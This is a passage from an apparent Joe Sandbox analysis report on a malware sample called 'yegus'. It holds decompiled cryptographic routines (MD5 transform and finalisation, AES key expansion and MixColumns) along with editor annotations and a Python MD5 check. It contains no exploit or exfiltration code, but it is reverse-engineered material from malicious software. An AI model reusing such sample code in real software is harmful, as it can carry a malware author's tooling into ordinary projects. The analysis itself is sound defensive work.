    				_v76 = _t612;
    				asm("rol esi, 0xb");
    				_t698 = _t696 + (_t657 ^ _t368 ^ _t612) + 0xeaa127fa + _v72 + _t612;
    				asm("rol edi, 0x10");
    				_t659 = _t657 + (_t698 ^ _t368 ^ _t612) + 0xd4ef3085 + _v60 + _t698;
    				_t557 = _t698 ^ _t659;
    				asm("ror edx, 0x9");
    				_t617 = (_t612 ^ _t557) + 0x4881d05 + _v48 + _t368 + _t659;
    				asm("rol ecx, 0x4");
    				_t561 = (_t557 ^ _t617) + _v36 + _v76 + 0xd9d4d039 + _t617;
    				asm("rol esi, 0xb");
    				_t700 = _t698 + (_t659 ^ _t617 ^ _t561) + 0xe6db99e5 + _v24 + _t561;
    				asm("rol edi, 0x10");
    				_t661 = _t659 + (_t700 ^ _t617 ^ _t561) + 0x1fa27cf8 + _v12 + _t700;
    				asm("ror edx, 0x9");
    				_t619 = _t617 + (_t700 ^ _t661 ^ _t561) + 0xc4ac5665 + _v64 + _t661;
    				asm("rol ecx, 0x6");
    				_t563 = _t561 + (( !_t700 | _t619) ^ _t661) + 0xf4292244 + _v72 + _t619;
    				asm("rol esi, 0xa");
    				_t702 = _t700 + (( !_t661 | _t563) ^ _t619) + 0x432aff97 + _v44 + _t563;
    				asm("rol edi, 0xf");
    				_t663 = _t661 + (( !_t619 | _t702) ^ _t563) + 0xab9423a7 + _v16 + _t702;
    				asm("ror edx, 0xb");
    				_t621 = _t619 + (( !_t563 | _t663) ^ _t702) + 0xfc93a039 + _v52 + _t663;
    				asm("rol ecx, 0x6");
    				_t565 = _t563 + (( !_t702 | _t621) ^ _t663) + 0x655b59c3 + _v24 + _t621;
    				asm("rol esi, 0xa");
    				_t704 = _t702 + (( !_t663 | _t565) ^ _t621) + 0x8f0ccc92 + _v60 + _t565;
    				asm("rol edi, 0xf");
    				_t665 = _t663 + (( !_t621 | _t704) ^ _t565) + 0xffeff47d + _v32 + _t704;
    				asm("ror edx, 0xb");
    				_t623 = _t621 + (( !_t565 | _t665) ^ _t704) + 0x85845dd1 + _v68 + _t665;
    				asm("rol ecx, 0x6");
    				_t567 = _t565 + (( !_t704 | _t623) ^ _t665) + 0x6fa87e4f + _v40 + _t623;
    				asm("rol ebx, 0xa");
    				_t371 = _t704 - 0x1d31920 + (( !_t665 | _t567) ^ _t623) + _v12 + _t567;
    				asm("rol edi, 0xf");
    				_t667 = _t665 + (( !_t623 | _t371) ^ _t567) + 0xa3014314 + _v48 + _t371;
    				asm("ror edx, 0xb");
    				_t625 = _t623 + (( !_t567 | _t667) ^ _t371) + 0x4e0811a1 + _v20 + _t667;
    				_v76 = _t625;
    				_t668 = _v80;
    				asm("rol esi, 0x6");
    				_t707 = _t567 - 0x8ac817e + (( !_t371 | _t625) ^ _t667) + _v56 + _t625;
    				 *((intOrPtr*)(_t668 + 0x50)) =  *((intOrPtr*)(_t668 + 0x50)) + _t707;
    				_t372 = _v76;
    				asm("rol edx, 0xa");
    				_t628 = _t371 - 0x42c50dcb + (( !_t667 | _t707) ^ _t625) + _v28 + _t707;
    				asm("rol ecx, 0xf");
    				_t570 = _t667 + 0x2ad7d2bb + (( !_t372 | _t628) ^ _t707) + _v64 + _t628;
    				 *((intOrPtr*)(_t668 + 0x58)) =  *((intOrPtr*)(_t668 + 0x58)) + _t570;
    				asm("ror eax, 0xb");
    				 *((intOrPtr*)(_t668 + 0x5c)) =  *((intOrPtr*)(_t668 + 0x5c)) + _t628;
    				 *((intOrPtr*)(_t668 + 0x54)) = _t372 - 0x14792c6f + (( !_t707 | _t570) ^ _t628) + _v36 +  *((intOrPtr*)(_t668 + 0x54)) + _t570;
    				return E01333E82(_t372, _v8 ^ _t712, _t668, (( !_t707 | _t570) ^ _t628) + _v36);
    			}
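By its constants and rotations the routine above is an MD5 block transform: the loop at the top gathers sixteen 32-bit words little-endian from the buffer at __edx, the four state words are read from __ecx+0x50, +0x54, +0x58 and +0x5c and added back at the end, the additive constants are 0xd76aa478, 0xe8c7b756 (printed as -0x173848aa), 0x242070db, 0xc1bdceee and the rest of the MD5 table, and the rotations run 7/12/17/22 (rol 7, rol 12, ror 15, ror 10), 5/9/14/20, 4/11/16/23 and 6/10/15/21 per round. The Python below is an added reference implementation, not code from the sample or from Joe Sandbox, that reproduces the transform so the identification can be checked: its constant table is generated from floor(|sin(i+1)| * 2^32) and can be compared with the immediates in the listing, and its digest is checked against hashlib.

```python
import hashlib
import math
import struct

MASK32 = 0xFFFFFFFF

# Per-step rotation amounts: the listing's rol 7/12 and ror 15/10 (= rol 17/22) in
# round 1, rol 5/9/14 and ror 12 (= rol 20) in round 2, and so on.
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4

# Additive constants K[i] = floor(|sin(i + 1)| * 2^32); K[0] is the 0xd76aa478 in the listing.
K = [int(abs(math.sin(i + 1)) * (1 << 32)) & MASK32 for i in range(64)]


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md5_compress(state, block):
    """One 64-byte block through the MD5 transform (the role of E01332B70).

    state: (A, B, C, D) as the routine reads them from ctx+0x50, +0x54, +0x58, +0x5c.
    block: 64 bytes, consumed as 16 little-endian words exactly as the byte-gathering
    loop at the top of the listing builds them.
    """
    a0, b0, c0, d0 = state
    m = struct.unpack("<16I", block)
    a, b, c, d = a0, b0, c0, d0
    for i in range(64):
        if i < 16:                       # F = (B & C) | (~B & D)
            f, g = (b & c) | (~b & d), i
        elif i < 32:                     # G = (D & B) | (~D & C)
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:                     # H = B ^ C ^ D
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:                            # I = C ^ (B | ~D)
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + m[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, S[i])) & MASK32
    # Feed-forward: the four "*(ctx+0x5X) += ..." stores at the end of the listing.
    return tuple((x + y) & MASK32 for x, y in zip((a0, b0, c0, d0), (a, b, c, d)))


def md5_hex(data):
    """Full MD5 over data: padding and length, then one md5_compress per block."""
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        state = md5_compress(state, msg[off:off + 64])
    return struct.pack("<4I", *state).hex()


def matches_hashlib(data):
    """Cross-check against the standard library: True when the transform really is MD5."""
    return md5_hex(data) == hashlib.md5(data).hexdigest()


if __name__ == "__main__":
    print(hex(K[0]), hex(K[1]))          # the first two immediates in the listing
    print(md5_hex(b"abc"), matches_hashlib(b"constructed input"))
```

A quick triage check on any similar routine is to compare its first few immediates with `K[:4]` and its rotation pairs with `S`; an MD5 variant with altered constants or shift order would fail one of the two comparisons while still looking like MD5 in the decompiled form.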

    0x01332b76
    0x01332b7d
    0x01332b84
    0x01332b88
    0x01332b8b
    0x01332b90
    0x01332b90
    0x01332b94
    0x01332bb2
    0x01332bb6
    0x01332bb7
    0x01332bbc
    0x01332bc1
    0x01332bc6
    0x01332be6
    0x01332be9
    0x01332bfb
    0x01332c03
    0x01332c06
    0x01332c27
    0x01332c30
    0x01332c43
    0x01332c46
    0x01332c5f
    0x01332c62
    0x01332c79
    0x01332c7c
    0x01332c97
    0x01332c9a
    0x01332cb3
    0x01332cb6
    0x01332ccf
    0x01332cd2
    0x01332ce9
    0x01332cec
    0x01332d07
    0x01332d0a
    0x01332d0e
    0x01332d26
    0x01332d29
    0x01332d2d
    0x01332d45
    0x01332d48
    0x01332d4c
    0x01332d62
    0x01332d65
    0x01332d69
    0x01332d6c
    0x01332d88
    0x01332d8b
    0x01332d94
    0x01332daa
    0x01332daf
    0x01332db2
    0x01332dcf
    0x01332dd2
    0x01332de1
    0x01332de6
    0x01332dfd
    0x01332e02
    0x01332e19
    0x01332e1e
    0x01332e35
    0x01332e3a
    0x01332e51
    0x01332e56
    0x01332e6d
    0x01332e72
    0x01332e8b
    0x01332e90
    0x01332ea7
    0x01332eac
    0x01332ec1
    0x01332ec6
    0x01332eca
    0x01332ede
    0x01332ee3
    0x01332ef8
    0x01332efb
    0x01332eff
    0x01332f26
    0x01332f2b
    0x01332f3a
    0x01332f3d
    0x01332f5d
    0x01332f62
    0x01332f75
    0x01332f78
    0x01332f8a
    0x01332f8d
    0x01332f9b
    0x01332f9e
    0x01332fb2
    0x01332fb5
    0x01332fb7
    0x01332fc7
    0x01332fca
    0x01332fdd
    0x01332fe0
    0x01332fee
    0x01332ff1
    0x01333005
    0x01333008
    0x0133300a
    0x0133301c
    0x0133301f
    0x01333030
    0x01333033
    0x01333037
    0x01333044
    0x01333047
    0x0133305e
    0x01333066
    0x01333068
    0x01333077
    0x0133307a
    0x01333087
    0x0133308a
    0x01333098
    0x0133309b
    0x013330af
    0x013330b2
    0x013330c6
    0x013330c9
    0x013330dd
    0x013330e0
    0x013330f4
    0x013330f7
    0x0133310b
    0x0133310e
    0x01333122
    0x01333125
    0x01333139
    0x0133313c
    0x01333150
    0x01333153
    0x01333165
    0x0133316a
    0x0133317a
    0x01333183
    0x0133319b
    0x0133319e
    0x013331b1
    0x013331b6
    0x013331ca
    0x013331cd
    0x013331e7
    0x013331ea
    0x013331ee
    0x013331fa
    0x013331ff
    0x01333202
    0x01333206
    0x01333214
    0x01333219
    0x01333220
    0x01333233
    0x01333236
    0x01333238
    0x01333244
    0x0133324c
    0x0133324f
    0x01333262

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 72%
    			E013310A0(signed char* __ecx, signed int* __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t86;
    				signed int _t112;
    				signed int _t124;
    				signed int _t125;
    				signed int _t184;
    				signed int _t191;
    				signed int _t194;
    				signed int _t198;
    				signed int _t220;
    				signed int _t235;
    				signed int _t239;
    				signed int _t243;
    				signed int* _t244;
    				unsigned int _t246;
    				signed int _t252;
    				signed int _t255;
    
    				_t86 =  *0x1347004; // 0x262637d3
    				_v8 = _t86 ^ _t252;
    				_t245 = __ecx;
    				_v68 = 0x1000000;
    				_t244 = __edx;
    				_v64 = 0x2000000;
    				_v60 = 0x4000000;
    				_v56 = 0x8000000;
    				_v52 = 0x10000000;
    				_v48 = 0x20000000;
    				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
    				_v44 = 0x40000000;
    				_v40 = 0x80000000;
    				_v36 = 0x1b000000;
    				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
    				_v32 = 0x36000000;
    				_v28 = 0x6c000000;
    				_v24 = 0xd8000000;
    				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
    				_v20 = 0xab000000;
    				_v16 = 0x4d000000;
    				_v12 = 0x9a000000;
    				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
    				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
    				_t125 = 8;
    				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
    				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
    				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
    				do {
    					_t112 = _t244[7];
    					_t184 = _t125 & 0x80000007;
    					if(_t184 < 0) {
    						_t184 = (_t184 - 0x00000001 | 0xfffffff8) + 1;
    						_t255 = _t184;
    					}
    					if(_t255 != 0) {
    						if(_t184 == 4) {
    							_t191 = _t112 >> 0x00000018 & 0x0000000f;
    							_t235 = (_t112 >> 0x1c) + (_t112 >> 0x1c);
    							_t194 = _t112 >> 0x00000010 & 0x0000000f;
    							_t239 = (_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f);
    							_t198 = _t112 >> 0x00000008 & 0x0000000f;
    							_t243 = (_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f);
    							_t245 = ((( *(_t191 + 0x13450a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0x13450a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0x13450a8 + _t243 * 8) & 0x000000ff) << 8;
    							_t112 = ( *((_t112 & 0x0000000f) + 0x13450a8 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *(_t191 + 0x13450a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0x13450a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0x13450a8 + _t243 * 8) & 0x000000ff) << 8);
    						}
    					} else {
    						asm("rol eax, 0x8");
    						_t246 = _t112;
    						_t245 = _t246 & 0x0000000f;
    						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x1c) + (_t246 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000010 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x00000014 & 0x0000000f) + (_t246 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000008 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x0000000c & 0x0000000f) + (_t246 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 & 0x0000000f) + 0x13450a8 + ((_t246 >> 0x00000004 & 0x0000000f) + (_t246 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
    						_t68 = _t125 - 1; // 0x7
    						_t220 = _t68;
    						if(_t220 < 0) {
    							_t220 = _t220 + 7;
    						}
    						_t112 = _t124 ^  *(_t252 + (_t220 >> 3) * 4 - 0x40);
    					}
    					_t125 = _t125 + 1;
    					_t244[8] =  *_t244 ^ _t112;
    					_t244 =  &(_t244[1]);
    				} while (_t125 < 0x3c);
    				return E01333E82(_t125, _v8 ^ _t252, _t244, _t245);
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 100%
    			// Added note (editor's annotation, not decompiler output): circulant GF(2^8) matrix multiply over four columns.
    			// Each column (bytes i, i+4, i+8, i+12) is recomputed from byte tables at 0x1344aaa..0x1344aad indexed by
    			// 6*byte (3*byte, times 2), with the table roles rotating row by row; this is the layout of an AES
    			// MixColumns / InvMixColumns step.
    			E013315E0(signed char* __ecx) {
    				signed char* _v8;
    				intOrPtr _v12;
    				signed char _t278;
    				signed char* _t279;
    				signed char* _t281;
    				signed char* _t283;
    				signed char* _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t291;
    				signed int _t293;
    				intOrPtr _t294;
    				signed int _t296;
    				signed int _t298;
    				signed int _t300;
    				signed int _t301;
    				signed int _t302;
    				signed int _t303;
    				signed int _t304;
    				signed int _t305;
    				signed int _t306;
    				signed int _t307;
    				signed int _t308;
    
    				_v8 = __ecx;
    				_t279 = _v8;
    				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
    				_t294 = _v12;
    				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
    				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
    				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
    				 *_t279 =  *(0x1344aaa + _t287 * 2) & 0x000000ff ^  *(0x1344aac + _t305 * 2) ^  *(0x1344aab + _t301 * 2) ^  *(_t294 + 0x1344aad);
    				_t279[4] =  *(0x1344aac + _t287 * 2) & 0x000000ff ^  *(0x1344aab + _t305 * 2) ^  *(0x1344aad + _t301 * 2) ^  *(_t294 + 0x1344aaa);
    				_t279[8] =  *(0x1344aab + _t287 * 2) & 0x000000ff ^  *(0x1344aad + _t305 * 2) ^  *(0x1344aaa + _t301 * 2) ^  *(_t294 + 0x1344aac);
    				_t279[0xc] =  *(0x1344aad + _t287 * 2) & 0x000000ff ^  *(0x1344aaa + _t305 * 2) ^  *(0x1344aac + _t301 * 2) ^  *(_t294 + 0x1344aab);
    				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
    				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
    				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
    				_t281 = _v8;
    				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
    				 *(_t281 + 1) =  *(0x1344aaa + _t289 * 2) & 0x000000ff ^  *(0x1344aac + _t296 * 2) ^  *(0x1344aab + _t306 * 2) ^  *(0x1344aad + _t302 * 2);
    				 *(_t281 + 5) =  *(0x1344aac + _t289 * 2) & 0x000000ff ^  *(0x1344aab + _t296 * 2) ^  *(0x1344aad + _t306 * 2) ^  *(0x1344aaa + _t302 * 2);
    				 *(_t281 + 9) =  *(0x1344aab + _t289 * 2) & 0x000000ff ^  *(0x1344aad + _t296 * 2) ^  *(0x1344aaa + _t306 * 2) ^  *(0x1344aac + _t302 * 2);
    				 *(_t281 + 0xd) =  *(0x1344aad + _t289 * 2) & 0x000000ff ^  *(0x1344aaa + _t296 * 2) ^  *(0x1344aac + _t306 * 2) ^  *(0x1344aab + _t302 * 2);
    				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
    				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
    				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
    				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
    				_t283 = _v8;
    				 *(_t283 + 2) =  *(0x1344aaa + _t291 * 2) & 0x000000ff ^  *(0x1344aac + _t298 * 2) ^  *(0x1344aab + _t307 * 2) ^  *(0x1344aad + _t303 * 2);
    				 *(_t283 + 6) =  *(0x1344aac + _t291 * 2) & 0x000000ff ^  *(0x1344aab + _t298 * 2) ^  *(0x1344aad + _t307 * 2) ^  *(0x1344aaa + _t303 * 2);
    				 *(_t283 + 0xa) =  *(0x1344aab + _t291 * 2) & 0x000000ff ^  *(0x1344aad + _t298 * 2) ^  *(0x1344aaa + _t307 * 2) ^  *(0x1344aac + _t303 * 2);
    				 *(_t283 + 0xe) =  *(0x1344aad + _t291 * 2) & 0x000000ff ^  *(0x1344aaa + _t298 * 2) ^  *(0x1344aac + _t307 * 2) ^  *(0x1344aab + _t303 * 2);
    				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
    				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
    				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
    				_t285 = _v8;
    				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
    				_t285[3] =  *(0x1344aaa + _t293 * 2) & 0x000000ff ^  *(0x1344aac + _t300 * 2) ^  *(0x1344aab + _t308 * 2) ^  *(0x1344aad + _t304 * 2);
    				_t285[7] =  *(0x1344aac + _t293 * 2) & 0x000000ff ^  *(0x1344aab + _t300 * 2) ^  *(0x1344aad + _t308 * 2) ^  *(0x1344aaa + _t304 * 2);
    				_t285[0xb] =  *(0x1344aab + _t293 * 2) & 0x000000ff ^  *(0x1344aad + _t300 * 2) ^  *(0x1344aaa + _t308 * 2) ^  *(0x1344aac + _t304 * 2);
    				_t278 =  *(0x1344aad + _t293 * 2) & 0x000000ff ^  *(0x1344aaa + _t300 * 2) ^  *(0x1344aac + _t308 * 2) ^  *(0x1344aab + _t304 * 2);
    				_t285[0xf] = _t278;
    				return _t278;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 97%
    			// Added note (editor's annotation, not decompiler output): hash finalisation. The buffer fill count lives at
    			// ctx+0x40 and the running 64-bit bit count at ctx+0x48/0x4c (updated here by the final partial block's
    			// length * 8, with the adc carrying into the high word). The code appends the 0x80 pad byte, zero-fills to
    			// offset 0x38 (the memset calls with shifted sizes are the decompiler's rendering of rep stosd/stosb),
    			// stores the bit length little-endian at +0x38..+0x3f (E0133F390 appears to be a 64-bit shift-right helper),
    			// runs the compression function E01332B70 and copies the four state words at +0x50..+0x5c out little-endian
    			// as a 16-byte digest: the MD5/MD4 layout.
    			E013332D0(intOrPtr __ecx, char* __edx) {
    				void* __edi;
    				intOrPtr _t77;
    				unsigned int _t123;
    				int _t125;
    				char* _t130;
    				void* _t157;
    				void* _t164;
    				void* _t165;
    				void* _t166;
    				void* _t167;
    				intOrPtr _t170;
    				void* _t171;
    
    				_t170 = __ecx;
    				_t130 = __edx;
    				_t77 =  *((intOrPtr*)(__ecx + 0x40));
    				 *((char*)(_t77 + __ecx)) = 0x80;
    				_t157 = _t77 + 1;
    				if(_t77 >= 0x38) {
    					if(_t157 < 0x40) {
    						_t165 = _t157 + __ecx;
    						_t125 = memset(_t165, 0, 0x40 << 2);
    						_t166 = _t165 + (0x40 - _t157 >> 2);
    						memset(_t166, _t125, 0 << 0);
    						_t171 = _t171 + 0x18;
    						_t164 = _t166;
    					}
    					E01332B70(_t170, _t170);
    					E01336200(_t164, _t170, 0, 0x38);
    				} else {
    					if(_t157 < 0x38) {
    						_t167 = _t157 + __ecx;
    						memset(_t167 + (0x38 - _t157 >> 2), memset(_t167, 0, 0x38 << 2), 0 << 0);
    					}
    				}
    				 *(_t170 + 0x48) =  *(_t170 + 0x48) + ( *(_t170 + 0x40) << 3);
    				asm("adc dword [esi+0x4c], 0x0");
    				 *((char*)(_t170 + 0x38)) =  *(_t170 + 0x48) & 0x000000ff;
    				 *((char*)(_t170 + 0x39)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 8;
    				 *((char*)(_t170 + 0x3a)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x10;
    				 *((char*)(_t170 + 0x3b)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x18;
    				 *((char*)(_t170 + 0x3c)) = E0133F390( *(_t170 + 0x48), 0x20,  *(_t170 + 0x4c));
    				 *((char*)(_t170 + 0x3d)) = E0133F390( *(_t170 + 0x48), 0x28,  *(_t170 + 0x4c));
    				 *((char*)(_t170 + 0x3e)) =  *(_t170 + 0x4e) & 0x000000ff;
    				 *((char*)(_t170 + 0x3f)) =  *(_t170 + 0x4f) & 0x000000ff;
    				E01332B70(_t170, _t170);
    				 *_t130 =  *(_t170 + 0x50);
    				 *((char*)(_t130 + 4)) =  *(_t170 + 0x54);
    				 *((char*)(_t130 + 8)) =  *(_t170 + 0x58);
    				 *((char*)(_t130 + 0xc)) =  *(_t170 + 0x5c);
    				 *((char*)(_t130 + 1)) =  *(_t170 + 0x50) >> 8;
    				 *((char*)(_t130 + 5)) =  *(_t170 + 0x54) >> 8;
    				 *((char*)(_t130 + 9)) =  *(_t170 + 0x58) >> 8;
    				 *((char*)(_t130 + 0xd)) =  *(_t170 + 0x5c) >> 8;
    				 *((char*)(_t130 + 2)) =  *(_t170 + 0x50) >> 0x10;
    				 *((char*)(_t130 + 6)) =  *(_t170 + 0x54) >> 0x10;
    				 *((char*)(_t130 + 0xa)) =  *(_t170 + 0x58) >> 0x10;
    				 *((char*)(_t130 + 0xe)) =  *(_t170 + 0x5c) >> 0x10;
    				 *((char*)(_t130 + 3)) =  *(_t170 + 0x50) >> 0x18;
    				 *((char*)(_t130 + 7)) =  *(_t170 + 0x54) >> 0x18;
    				 *((char*)(_t130 + 0xb)) =  *(_t170 + 0x58) >> 0x18;
    				_t123 =  *(_t170 + 0x5c) >> 0x18;
    				 *(_t130 + 0xf) = _t123;
    				return _t123;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 100%
    			// Added note (editor's annotation, not decompiler output): byte-sliced XOR of four input words into a
    			// four-word state: state[3] is XORed with all four whole words, state[2] with each word >> 8, state[1]
    			// with each word >> 16 and state[0] with each word >> 24; the return value (low byte of __edx[3]) is incidental.
    			E01331370(signed int* __ecx, signed int* __edx) {
    				signed char _t40;
    				unsigned int _t41;
    				unsigned int _t43;
    				unsigned int _t45;
    				unsigned int _t47;
    
    				_t41 =  *__edx;
    				__ecx[3] = __ecx[3] ^  *__edx;
    				__ecx[3] = __ecx[3] ^ __edx[1];
    				__ecx[3] = __ecx[3] ^ __edx[2];
    				_t40 = __edx[3];
    				__ecx[3] = __ecx[3] ^ _t40;
    				__ecx[2] = __ecx[2] ^ _t41 >> 0x00000008;
    				_t43 = __edx[1];
    				 *__ecx =  *__ecx ^ _t41 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t41 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t43 >> 0x00000008;
    				_t45 = __edx[2];
    				__ecx[0] = __ecx[0] ^ _t43 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t43 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t45 >> 0x00000008;
    				_t47 = __edx[3];
    				__ecx[0] = __ecx[0] ^ _t45 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t45 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t47 >> 0x00000008;
    				__ecx[0] = __ecx[0] ^ _t47 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t47 >> 0x00000010;
    				return _t40;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
